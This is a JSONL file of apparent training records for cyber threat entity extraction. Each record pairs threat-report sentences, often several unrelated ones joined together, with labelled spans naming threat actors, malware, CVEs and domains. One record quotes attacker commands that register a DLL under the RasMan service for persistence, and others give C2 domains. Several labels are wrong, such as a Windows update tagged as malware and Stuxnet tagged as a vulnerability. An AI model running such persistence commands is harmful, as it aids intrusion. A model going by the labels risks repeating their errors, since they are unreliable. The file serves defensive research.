{"text": "One representative sample Chrysaor app that we analyzed was tailored to devices running Jellybean ( 4.3 ) or earlier . Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . Wait time is chosen randomly in the range 2/3 t to 5/3 . The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"MALWARE: Chrysaor": [[26, 34]], "SYSTEM: Jellybean ( 4.3 )": [[88, 105]], "THREAT_ACTOR: actor": [[148, 153]], "ORGANIZATION: defense contractors": [[248, 267]], "THREAT_ACTOR: Winnti group": [[331, 343]], "ORGANIZATION: pharmaceutics": [[408, 421]], "ORGANIZATION: telecommunications": [[426, 444]]}, "info": {"id": "cyberner_stix_train_006718", "source": "cyberner_stix_train"}}
{"text": "They noted that this node appeared to be maliciously modifying any executables that were downloaded through it over a HTTP connection .", "spans": {}, "info": {"id": "cyberner_stix_train_006719", "source": "cyberner_stix_train"}}
{"text": "Since then , the implant ’ s functionality has been improving and remarkable new features implemented , such as the ability to record audio surroundings via the microphone when an infected device is in a specified location ; the stealing of WhatsApp messages via Accessibility Services ; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Cleaver : Threat Group 2889 , TG-2889 .", "spans": {"SYSTEM: WhatsApp": [[241, 249]], "THREAT_ACTOR: group": [[387, 392]], "THREAT_ACTOR: Cleaver": [[534, 541]], "THREAT_ACTOR: Threat Group 2889": [[544, 561]], "THREAT_ACTOR: TG-2889": [[564, 571]]}, "info": {"id": "cyberner_stix_train_006720", "source": "cyberner_stix_train"}}
{"text": "Upon creation , this activity launches a thread that will loop on a 50-second interval . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . HIGHTIDE : 6e59861931fa2796ee107dc27bfdd480 . Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": {"MALWARE: malicious attachments": [[179, 200]], "TOOL: Scout": [[249, 254]], "MALWARE: HIGHTIDE": [[314, 322]], "FILEPATH: 6e59861931fa2796ee107dc27bfdd480": [[325, 357]], "MALWARE: TrickBot": [[378, 386]]}, "info": {"id": "cyberner_stix_train_006721", "source": "cyberner_stix_train"}}
{"text": "data/configuration Exfiltration ;", "spans": {}, "info": {"id": "cyberner_stix_train_006722", "source": "cyberner_stix_train"}}
{"text": "Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play , Gmail , Google Photos , Google Docs , G Suite , Google Drive , and more . Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 . optblock_t for defeating control flow flattening ( defined as CFUnflattener ) In any case , the VBA code still runs whenever the files are executed .", "spans": {"SYSTEM: Google Play": [[130, 141]], "SYSTEM: Gmail": [[144, 149]], "SYSTEM: Google Photos": [[152, 165]], "SYSTEM: Google Docs": [[168, 179]], "SYSTEM: G Suite": [[182, 189]], "SYSTEM: Google Drive": [[192, 204]], "THREAT_ACTOR: APT38": [[224, 229]], "THREAT_ACTOR: group": [[258, 263]], "ORGANIZATION: financial institutions": [[280, 302]], "TOOL: optblock_t": [[464, 474]], "MALWARE: VBA code": [[560, 568]]}, "info": {"id": "cyberner_stix_train_006723", "source": "cyberner_stix_train"}}
{"text": "We assess that the Lazarus group has been more careful in its attacks following the release of Operation AppleJeus and they have employed a number of methods to avoid being detected .", "spans": {"THREAT_ACTOR: Lazarus": [[19, 26]]}, "info": {"id": "cyberner_stix_train_006724", "source": "cyberner_stix_train"}}
{"text": "Targeted senior figures managed communications and media affairs , policy , speech writing , finance , and travel , while junior figures arranged schedules and travel for Hillary Clinton's campaign trail .", "spans": {}, "info": {"id": "cyberner_stix_train_006725", "source": "cyberner_stix_train"}}
{"text": "The malware leverages an exploit , codenamed EternalBlue” , that was released by the Shadow Brokers on April 14 , 2017 . Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"VULNERABILITY: EternalBlue”": [[45, 57]], "THREAT_ACTOR: Shadow Brokers": [[85, 99]], "THREAT_ACTOR: Gallmaker": [[121, 130]], "ORGANIZATION: embassies": [[146, 155]]}, "info": {"id": "cyberner_stix_train_006726", "source": "cyberner_stix_train"}}
{"text": "But on rare occasions , a customer decides to go public with information about their incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and help protect even those who do not happen to be our customers .", "spans": {}, "info": {"id": "cyberner_stix_train_006727", "source": "cyberner_stix_train"}}
{"text": "The properties of the artifact show that the same authors of the malware seem to have called it Xtunnel .", "spans": {"MALWARE: Xtunnel": [[96, 103]]}, "info": {"id": "cyberner_stix_train_006728", "source": "cyberner_stix_train"}}
{"text": "The malware sets a registry value ( whose name is read from the configuration file ) to “ C : \\Windows\\system32\\rundll32.exe c : \\ProgramData\\AuditApp\\d3d9.dll , Control_Run ” . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the AES implementations makes use of the Intel AES-NI encryption instruction set which is supported by several modern Intel and AMD CPUs . By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": {"THREAT_ACTOR: APT35": [[178, 183]], "TOOL: custom backdoor": [[213, 228]], "ORGANIZATION: Intel": [[329, 334], [406, 411]], "TOOL: AES-NI": [[335, 341]], "ORGANIZATION: AMD": [[416, 419]]}, "info": {"id": "cyberner_stix_train_006729", "source": "cyberner_stix_train"}}
{"text": "24 Aug 2016 - 02:05PM Android/Twitoor is a backdoor capable of downloading other malware onto an infected device . Scattered Canary’s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 .", "spans": {"MALWARE: Android/Twitoor": [[22, 37]], "THREAT_ACTOR: Scattered Canary’s": [[115, 133]], "THREAT_ACTOR: group": [[206, 211]]}, "info": {"id": "cyberner_stix_train_006730", "source": "cyberner_stix_train"}}
{"text": "The Kaspersky Labs analysis of the Duke malware authors ’ working times is supported by our own analysis , as well as that performed by FireEye .", "spans": {"ORGANIZATION: Kaspersky Labs": [[4, 18]], "THREAT_ACTOR: Duke": [[35, 39]], "ORGANIZATION: FireEye": [[136, 143]]}, "info": {"id": "cyberner_stix_train_006731", "source": "cyberner_stix_train"}}
{"text": "cmd.exe /c dir rasext.dll , cmd.exe /c dir msctfp.dat , cmd.exe /c tasklist /svc | findstr RasMan , cmd.exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v DllName /d rasext.dll /f .", "spans": {"FILEPATH: cmd.exe": [[0, 7], [28, 35], [56, 63], [100, 107]], "FILEPATH: rasext.dll": [[15, 25], [204, 214]], "FILEPATH: msctfp.dat": [[43, 53]], "TOOL: RasMan": [[91, 97]]}, "info": {"id": "cyberner_stix_train_006732", "source": "cyberner_stix_train"}}
{"text": "Of those , 21 were still available at the time of discovery . ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . Loading the dropped library .", "spans": {"ORGANIZATION: ESET": [[62, 66]], "MALWARE: sample": [[98, 104]], "THREAT_ACTOR: OceanLotus": [[114, 124]]}, "info": {"id": "cyberner_stix_train_006733", "source": "cyberner_stix_train"}}
{"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . The dropped PE file has the distinctive file name 8.t” .", "spans": {"ORGANIZATION: high-tech": [[13, 22]], "ORGANIZATION: manufacturing": [[27, 40]], "THREAT_ACTOR: DragonOK": [[74, 82]], "ORGANIZATION: economic": [[132, 140]], "MALWARE: PE": [[165, 167]], "FILEPATH: 8.t”": [[203, 207]]}, "info": {"id": "cyberner_stix_train_006734", "source": "cyberner_stix_train"}}
{"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "TOOL: FuZZbuNch": [[81, 90]], "TOOL: DisableSecurity": [[196, 211]], "TOOL: EnableSecurity": [[216, 230]], "TOOL: DarkPulsar": [[235, 245]], "MALWARE: Windows 10 Creators Update": [[252, 278]], "ORGANIZATION: Windows Defender ATP": [[314, 334]], "ORGANIZATION: SOC personnel": [[353, 366]]}, "info": {"id": "cyberner_stix_train_006735", "source": "cyberner_stix_train"}}
{"text": "The shell backdoor then installs the RCSAndroid agent . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . the original implementation of the code only works in MMAT_LOCOPT maturity level . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"MALWARE: RCSAndroid": [[37, 47]], "VULNERABILITY: Carbanak": [[66, 74]], "ORGANIZATION: banks": [[111, 116]], "ORGANIZATION: electronic payment": [[121, 139]], "ORGANIZATION: space": [[181, 186]], "TOOL: MMAT_LOCOPT": [[243, 254]]}, "info": {"id": "cyberner_stix_train_006736", "source": "cyberner_stix_train"}}
{"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"MALWARE: Locky": [[43, 48]], "ORGANIZATION: Iranian women 's activist": [[239, 264]], "ORGANIZATION: individual": [[270, 280]]}, "info": {"id": "cyberner_stix_train_006737", "source": "cyberner_stix_train"}}
{"text": "The sample we analyzed is using RijndaelManaged with ECB mode and PKCS7 padding .", "spans": {}, "info": {"id": "cyberner_stix_train_006738", "source": "cyberner_stix_train"}}
{"text": "Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {"ORGANIZATION: Uyghur ethnic group": [[216, 235]], "ORGANIZATION: Muslim minority group": [[240, 261]]}, "info": {"id": "cyberner_stix_train_006739", "source": "cyberner_stix_train"}}
{"text": "The version of the legitimate DroidVPN embedded inside this HenBox variant is the same version of DroidVPN available for download from uyghurapps [ . Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": {"MALWARE: HenBox": [[60, 66]], "THREAT_ACTOR: Winnti": [[150, 156]], "ORGANIZATION: high-tech companies": [[170, 189]], "ORGANIZATION: pharmaceutical companies": [[214, 238]], "THREAT_ACTOR: APT groups": [[326, 336]], "ORGANIZATION: high-tech": [[431, 440]], "ORGANIZATION: government services": [[443, 462]], "ORGANIZATION: media": [[465, 470]], "ORGANIZATION: financial services industries": [[475, 504]]}, "info": {"id": "cyberner_stix_train_006740", "source": "cyberner_stix_train"}}
{"text": "Perpetrated by an Arabic-Speaking APT Group : The modus-operandi of the attackers in conjunction with the social engineering tactics and decoy content seem aligned with previous attacks carried out by the Arabic-speaking APT group MoleRATs ( aka Gaza Cybergang ) .", "spans": {"THREAT_ACTOR: MoleRATs": [[231, 239]], "THREAT_ACTOR: Gaza Cybergang": [[246, 260]]}, "info": {"id": "cyberner_stix_train_006741", "source": "cyberner_stix_train"}}
{"text": "Kelihos , like many others , implemented a sophisticated spam engine that automatically constructs spam messages from templates and additional inputs to avoid any patterns that can be used in filters . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"TOOL: Kelihos": [[0, 7]], "VULNERABILITY: zero-day": [[267, 275]]}, "info": {"id": "cyberner_stix_train_006742", "source": "cyberner_stix_train"}}
{"text": "WolfRAT is a specifically targeted RAT which we assess to be aimed at Thai individuals and , based on previous work from Wolf Research , most likely used as an intelligence-gathering tool or interception tool . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "ORGANIZATION: Wolf Research ,": [[121, 136]], "ORGANIZATION: Rapid7": [[230, 236]], "TOOL: KeyBoy": [[278, 284]], "TOOL: MS12-060": [[372, 380]], "ORGANIZATION: FireEye": [[440, 447]], "MALWARE: RIPTIDE": [[473, 480]], "MALWARE: HIGHTIDE": [[484, 492]], "THREAT_ACTOR: APT12": [[563, 568]], "ORGANIZATION: Mastodon": [[662, 670]], "ORGANIZATION: Randy McEoin": [[679, 691]]}, "info": {"id": "cyberner_stix_train_006743", "source": "cyberner_stix_train"}}
{"text": "Use stringent file reputation settings .", "spans": {}, "info": {"id": "cyberner_stix_train_006744", "source": "cyberner_stix_train"}}
{"text": "The two C&C ’s hardcoded in the configuration block of the main binary are :", "spans": {"TOOL: C&C": [[8, 11]]}, "info": {"id": "cyberner_stix_train_006745", "source": "cyberner_stix_train"}}
{"text": "The domain on this campaign was registered on Jan. 19 , 2019 . Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions . OceanLotus : worker.baraeme.com:8888 11b4 . The Platform can look for indicators across file attachments , embedded links , and more and provides inplatform scoring .", "spans": {"THREAT_ACTOR: APT10": [[125, 130]], "ORGANIZATION: MSPs": [[170, 174]], "ORGANIZATION: institutions": [[264, 276]], "THREAT_ACTOR: OceanLotus": [[279, 289]], "DOMAIN: worker.baraeme.com:8888": [[292, 315]], "TOOL: Platform": [[327, 335]]}, "info": {"id": "cyberner_stix_train_006746", "source": "cyberner_stix_train"}}
{"text": "On the Windows XP platform , this support is provided by the csrss.exe process .", "spans": {"SYSTEM: Windows XP": [[7, 17]], "FILEPATH: csrss.exe": [[61, 70]]}, "info": {"id": "cyberner_stix_train_006747", "source": "cyberner_stix_train"}}
{"text": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": {"TOOL: malware": [[5, 12]], "THREAT_ACTOR: Lazarus": [[43, 50]]}, "info": {"id": "cyberner_stix_train_006748", "source": "cyberner_stix_train"}}
{"text": "As root , the application copies su binary to /system/bin directory and silently downloads apk file from the server . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering .", "spans": {"ORGANIZATION: FireEye": [[131, 138]], "THREAT_ACTOR: admin@338": [[145, 154]], "VULNERABILITY: Microsoft Office vulnerabilities": [[222, 254]], "TOOL: LOWBALL": [[305, 312]], "MALWARE: DustySky": [[315, 323]], "THREAT_ACTOR: Molerats": [[370, 378]], "THREAT_ACTOR: Gaza cybergang": [[387, 401]]}, "info": {"id": "cyberner_stix_train_006749", "source": "cyberner_stix_train"}}
{"text": "After all , Stuxnet , widely regarded as the world ’s first known cyberweapon , was signed using stolen certificates from companies based in Taiwan with dates much earlier than Suckfly .", "spans": {"VULNERABILITY: Stuxnet": [[12, 19]], "THREAT_ACTOR: Suckfly": [[177, 184]]}, "info": {"id": "cyberner_stix_train_006750", "source": "cyberner_stix_train"}}
{"text": "The doping allegations and prospective ban from the Games further ostracized Russia , and likely provided motivation to actively counter the allegations by attempting to discredit anti-doping agencies and policies .", "spans": {}, "info": {"id": "cyberner_stix_train_006751", "source": "cyberner_stix_train"}}
{"text": "Much of the activity was observed in the United States (Figure 11) , and the most targeted industry vertical was Aerospace/Defense Contractors (Figure 12) . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"ORGANIZATION: Aerospace/Defense": [[113, 130]], "ORGANIZATION: employees": [[338, 347]], "ORGANIZATION: financial entities": [[353, 371]]}, "info": {"id": "cyberner_stix_train_006752", "source": "cyberner_stix_train"}}
{"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors .", "spans": {"MALWARE: Documents": [[0, 9]], "VULNERABILITY: Flash exploit": [[19, 32]], "ORGANIZATION: government": [[164, 174]], "ORGANIZATION: aerospace": [[177, 186]], "ORGANIZATION: NGO": [[189, 192]], "ORGANIZATION: defense": [[195, 202]], "ORGANIZATION: cryptology": [[205, 215]], "ORGANIZATION: education sectors": [[220, 237]]}, "info": {"id": "cyberner_stix_train_006753", "source": "cyberner_stix_train"}}
{"text": "When required , the Trojan sends an SMS to the specified phone number with the information it has received from the intercepted message . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . In November 2017 , Secureworks Counter Threat Unit™ ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"MALWARE: .rtf file": [[181, 190]], "VULNERABILITY: CVE-2017-0199": [[206, 219]], "ORGANIZATION: Secureworks Counter Threat Unit™": [[241, 273]], "ORGANIZATION: CTU": [[276, 279]], "THREAT_ACTOR: Lazarus Group": [[352, 365]], "THREAT_ACTOR: NICKEL ACADEMY": [[392, 406]], "ORGANIZATION: Secureworks": [[410, 421]], "ORGANIZATION: cryptocurrency company": [[541, 563]]}, "info": {"id": "cyberner_stix_train_006754", "source": "cyberner_stix_train"}}
{"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": {"TOOL: Hermes": [[31, 37]], "MALWARE: bitsran.exe": [[42, 53]], "MALWARE: RSW7B37.tmp": [[58, 69]], "THREAT_ACTOR: actors": [[76, 82]], "VULNERABILITY: exploit": [[96, 103]], "VULNERABILITY: CVE-2014-6332": [[104, 117]], "MALWARE: Trojan": [[202, 208]], "MALWARE: Emissary": [[216, 224]]}, "info": {"id": "cyberner_stix_train_006755", "source": "cyberner_stix_train"}}
{"text": "” : ” load ” } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS . After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought . Another variant executes a set of commands once a system is successfully compromised . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": {"ORGANIZATION: CTU": [[203, 206]], "THREAT_ACTOR: TG-3390": [[221, 228]], "ORGANIZATION: Bullock": [[483, 490]], "THREAT_ACTOR: Ashley Madison hackers": [[569, 591]], "ORGANIZATION: Biderman": [[603, 611]]}, "info": {"id": "cyberner_stix_train_006756", "source": "cyberner_stix_train"}}
{"text": "In this instance , the backdoor posts the data to the domain Nysura.com ( For more domains , please see the IOC section of this research ) .", "spans": {"DOMAIN: Nysura.com": [[61, 71]]}, "info": {"id": "cyberner_stix_train_006757", "source": "cyberner_stix_train"}}
{"text": "Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts .", "spans": {"THREAT_ACTOR: activity groups": [[12, 27]], "ORGANIZATION: economic": [[86, 94]], "THREAT_ACTOR: PROMETHIUM": [[107, 117]], "THREAT_ACTOR: NEODYMIUM": [[122, 131]], "THREAT_ACTOR: XENOTIME": [[216, 224]], "MALWARE: credential capture and replay": [[230, 259]], "SYSTEM: Windows": [[287, 294]], "MALWARE: PSExec": [[342, 348]]}, "info": {"id": "cyberner_stix_train_006758", "source": "cyberner_stix_train"}}
{"text": "The infected application contains its payload inside the DEX file . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post . It replaces the contents of the legitimate process with malicious code . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"ORGANIZATION: newspapers": [[120, 130]], "ORGANIZATION: Washington Post": [[195, 210]]}, "info": {"id": "cyberner_stix_train_006759", "source": "cyberner_stix_train"}}
{"text": "Background Uncovering PHAs takes a lot of detective work and unraveling the mystery of how they 're possibly connected to other apps takes even more . On it , MoneyTaker install a legitimate tool for penetration testing – Metasploit . Following the exploitation of the EPS and CVE-2015-1701 vulnerabilities , the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample . If the system is in a single - system domain , it will execute on the local computer .", "spans": {"THREAT_ACTOR: MoneyTaker": [[159, 169]], "TOOL: Metasploit": [[222, 232]], "TOOL: EPS": [[269, 272]], "VULNERABILITY: CVE-2015-1701": [[277, 290]], "MALWARE: IRONHALO": [[391, 399]]}, "info": {"id": "cyberner_stix_train_006760", "source": "cyberner_stix_train"}}
{"text": "Our researchers are working closely with Google to investigate the source of the Gooligan campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . it is important to understand Hex-Rays maturity levels . None The bottom line is that BadBlood is not one of its kind however , for Charming Kitten , it implies a shift in target and collection priorities as they usually target dissidents , academics , diplomats , and journalists in order to further Iranian IRGC interests .", "spans": {"ORGANIZATION: Google": [[41, 47]], "MALWARE: Gooligan campaign": [[81, 98]], "THREAT_ACTOR: APT38": [[121, 126]], "TOOL: NESTEGG": [[136, 143]], "TOOL: KEYLIME": [[163, 170]], "TOOL: keylogger": [[175, 184]], "ORGANIZATION: bank": [[274, 278]], "TOOL: Hex-Rays": [[311, 319]], "THREAT_ACTOR: Charming Kitten": [[413, 428]], "ORGANIZATION: dissidents , academics , diplomats , and journalists": [[509, 561]]}, "info": {"id": "cyberner_stix_train_006761", "source": "cyberner_stix_train"}}
{"text": "These targets include foreign affairs government organizations both localized and abroad , and defense organizations ’ presence localized , located in Europe and also located in Afghanistan .", "spans": {}, "info": {"id": "cyberner_stix_train_006762", "source": "cyberner_stix_train"}}
{"text": "If any application from that list was found , it utilizes the Janus vulnerability to inject the “ boot ” module into the repacked application . The threat actors have continually used Flash Player installers and Flash slideshows for decoys . 2 、An MSI package file downloaded from one of the URLs ; During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": {"VULNERABILITY: Janus": [[62, 67]], "TOOL: Flash Player installers": [[184, 207]], "TOOL: Flash slideshows": [[212, 228]], "TOOL: MSI": [[248, 251]], "THREAT_ACTOR: SolarWinds Compromise": [[310, 331]], "THREAT_ACTOR: APT29": [[334, 339]]}, "info": {"id": "cyberner_stix_train_006763", "source": "cyberner_stix_train"}}
{"text": "The files appear to include logs from 2013 that show the NSA was also targeting oil and investment companies across the Middle East . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": {"ORGANIZATION: NSA": [[57, 60]], "ORGANIZATION: oil": [[80, 83]], "ORGANIZATION: investment companies": [[88, 108]], "ORGANIZATION: anti-government separatists": [[246, 273]]}, "info": {"id": "cyberner_stix_train_006764", "source": "cyberner_stix_train"}}
{"text": "It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell .", "spans": {"MALWARE: SWAnalytics": [[60, 71]], "THREAT_ACTOR: Emissary Panda": [[102, 116]], "VULNERABILITY: vulnerability": [[146, 159]], "ORGANIZATION: Microsoft": [[163, 172]], "VULNERABILITY: CVE-2019-0604": [[195, 208]]}, "info": {"id": "cyberner_stix_train_006765", "source": "cyberner_stix_train"}}
{"text": "Red Alert 2.0 is a banking bot that is currently very active online , and presents a risk to Android devices . Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) . HexRaysDeob is an IDA Pro plugin written by Rolf Rolles to address obfuscation seen in binaries . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"MALWARE: Red Alert 2.0": [[0, 13]], "THREAT_ACTOR: groups": [[244, 250]], "THREAT_ACTOR: TEMP.Hermit": [[363, 374]], "THREAT_ACTOR: group": [[388, 393]], "THREAT_ACTOR: APT38": [[425, 430]], "TOOL: HexRaysDeob": [[435, 446]], "TOOL: IDA Pro": [[453, 460]], "THREAT_ACTOR: threat researcher": [[552, 569]], "VULNERABILITY: discovered an attacker ’s tooling via an open repository , downloaded all of the tools": [[593, 679]]}, "info": {"id": "cyberner_stix_train_006766", "source": "cyberner_stix_train"}}
{"text": "While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign .", "spans": {"VULNERABILITY: CVE-2015-8651": [[147, 160]], "VULNERABILITY: CVE-2016-1019": [[163, 176]], "VULNERABILITY: CVE-2016-4117": [[183, 196]], "THREAT_ACTOR: Turla": [[267, 272]]}, "info": {"id": "cyberner_stix_train_006767", "source": "cyberner_stix_train"}}
{"text": "Sofacy Continues Global Attacks and Wheels Out New Cannon Trojan .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "TOOL: Cannon": [[51, 57]], "MALWARE: Trojan": [[58, 64]]}, "info": {"id": "cyberner_stix_train_006768", "source": "cyberner_stix_train"}}
{"text": "Communication between both Trojans and their C & C servers is based on the same principle , the relative addresses to which Trojans send network requests are generated in a similar manner , and the set of possible commands that the two Trojans can perform also overlaps . Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions . Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a “ whole kit ” of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via “ security through obscurity. ” They attempted to evade traffic inspection by encoding the code for the scanner with base-64 . In April 2021 , a new campaign by OilRig was discovered by researchers at Checkpoint in which the group employed a new backdoor variant dubbed SideTwist against what appears to be a Lebanese target .", "spans": {"ORGANIZATION: CTU": [[283, 286]], "THREAT_ACTOR: Threat Group-1314": [[340, 357]], "TOOL: C&C": [[490, 493]], "THREAT_ACTOR: OilRig": [[907, 913]], "ORGANIZATION: Checkpoint": [[947, 957]], "MALWARE: SideTwist": [[1016, 1025]], "ORGANIZATION: Lebanese target": [[1055, 1070]]}, "info": {"id": "cyberner_stix_train_006769", "source": "cyberner_stix_train"}}
{"text": "As many people use their mobile devices for online shopping and even to manage their bank accounts , the mobile arena became increasingly profitable for cyber criminals . In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 .", "spans": {"TOOL: publicly available tools": [[218, 242]], "TOOL: Mimikatz": [[255, 263]], "TOOL: Hacktool.Mimikatz": [[266, 283]], "VULNERABILITY: CVE-2016-0051": [[377, 390]], "ORGANIZATION: MSPs": [[418, 422]], "THREAT_ACTOR: actors": [[492, 498]], "THREAT_ACTOR: APT10": [[507, 512]]}, "info": {"id": "cyberner_stix_train_006770", "source": "cyberner_stix_train"}}
{"text": "Also , the longer the delay , the lower the risk of the user associating the unwanted ads with a particular app . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The last campaign was started a few days ago and is still active .", "spans": {"MALWARE: decoy files": [[128, 139]]}, "info": {"id": "cyberner_stix_train_006771", "source": "cyberner_stix_train"}}
{"text": "In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]], "FILEPATH: implant": [[351, 358]], "THREAT_ACTOR: Gamaredon": [[363, 372]]}, "info": {"id": "cyberner_stix_train_006772", "source": "cyberner_stix_train"}}
{"text": "A XENOTIME to Remember : Veles in the Wild .", "spans": {"THREAT_ACTOR: XENOTIME": [[2, 10]], "TOOL: Veles": [[25, 30]]}, "info": {"id": "cyberner_stix_train_006773", "source": "cyberner_stix_train"}}
